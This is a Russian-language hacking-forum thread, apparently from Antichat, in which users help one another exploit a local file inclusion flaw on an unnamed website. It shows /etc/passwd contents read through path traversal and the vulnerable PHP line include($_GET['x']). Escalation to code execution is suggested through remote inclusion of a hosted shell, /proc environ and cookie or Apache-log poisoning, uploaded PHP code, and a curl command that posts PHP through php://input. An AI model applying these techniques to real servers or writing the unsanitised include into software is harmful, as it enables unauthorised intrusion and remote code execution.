LFI

brown · 25 Mar 2017

Есть LFI но какойто странный)
Допустим ../../../../../etc/passwd показывает ифну
root:x:0:0:root:/root:/bin/bash..
Пишу просто /etc/passwd показывает инфу)
root:x:0:0:root:/root:/bin/bash

Кто с таким сталкивался?

И есть аналог этой проги под линукс?
/threads/162198/

crlf · 25 Mar 2017

PHP:

include($_GET['x']);

В кали есть что-то похожее, fimap.

brown · 25 Mar 2017

А почему получается так что не важно скок папок до корневой директории?

crlf · 26 Mar 2017

Отсутствует префикс. Должно крутиться как RFI.

brown · 6 Apr 2017

crlf said: ↑

Отсутствует префикс. Должно крутиться как RFI.
Click to expand...

не крутится как RFI((То есть залил шел на свой хост указал путь до него.А как в таком случае крутить как LFI?

Gorev · 6 Apr 2017

proc/environ? куки и тд

t0ma5 · 6 Apr 2017

brown said: ↑

Есть LFI но какойто странный)
Допустим ../../../../../etc/passwd показывает ифну
root:x:0:0:root:/root:/bin/bash..
Пишу просто /etc/passwd показывает инфу)
root:x:0:0:root:/root:/bin/bash

Кто с таким сталкивался?

И есть аналог этой проги под линукс?
/threads/162198/
Click to expand...

инклуд нормально инклудит потоки, если вариант такой как описал crlf , то должна работать конструкция
curl 'site.com/?x=php://input' --data '<?php phpinfo();?>'
логи апача ещё можно попробовать
если есть какие нибудь аплоады на сервер - попробовать протащить php код, не важно в каком файле

LFI

brown Member

crlf Green member

brown Member

crlf Green member

brown Member

Gorev Level 8

t0ma5 Reservists Of Antichat

Useful Searches

LFI

brown Member

crlf Green member

brown Member

crlf Green member

brown Member

Gorev Level 8

t0ma5 Reservists Of Antichat